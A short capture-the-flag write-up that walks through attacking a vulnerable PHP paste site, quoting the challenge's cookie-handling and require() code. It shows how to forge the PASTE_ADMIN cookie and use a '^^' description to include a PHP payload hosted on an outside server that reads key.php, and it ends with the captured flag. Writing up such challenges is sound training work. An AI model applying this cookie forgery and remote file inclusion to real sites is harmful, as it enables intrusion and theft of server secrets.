For this challenge we get the PHP source to a web page. In cookies.php, we see:
if (!isset($_COOKIE[PASTE_ADMIN]))
setcookie(PASTE_ADMIN, 'FALSE', time() + 60 * 60 * 24 * 2);
Looks suspicious. We will probably want to set the cookie PASTE_ADMIN to TRUE. Look elsewhere for what admin gets us, in make_followup.php:
if (!(isset($_COOKIE[PASTE_ADMIN]) && $_COOKIE[PASTE_ADMIN] == 'TRUE')) {
$admin = true;
foreach ($_COOKIE as $name => $value) {
if ($value == 'TRUE' && $name != PASTE_ADMIN) {
$admin = false; break;
}
}
while (!$admin && strlen($description) > 0 && strcmp(substr($description, 0, 2), "^^") == 0) {
$description = substr($description, 2);
}
}
So, only the PASTE_ADMIN cookie can be set, and it's trimming out a "^^" in the string if you aren't admin. In display_paste.php:
if (strcmp(substr($description, 0, 2), "^^") == 0) {
require(substr($description, 2) . ".txt");
}
So, if you are admin, you can make a post with "^^" at the start, and displaying the post will include an arbitrary PHP source file. First, look at the cookies in the browser. All of them are encoded as hex strings, so we don't know which one is PASTE_ADMIN. Since only one can be set, we just tried each one until we got admin. Turned out the first one was correct. Submitting "^^test" caused a blank page (PHP error).
Now, we need to grab the key off the server. Place the following file anywhere on a web server (watching out for the ".txt" appended to the URL by the challenge site):
PHP Payload: <? file_get_contents("key.php"); ?>
Make a post with "^^" followed by the URL (minus the .txt), and this gives the key when the post is displayed:
s0m3_php_d3v5_actua11y_d0_th15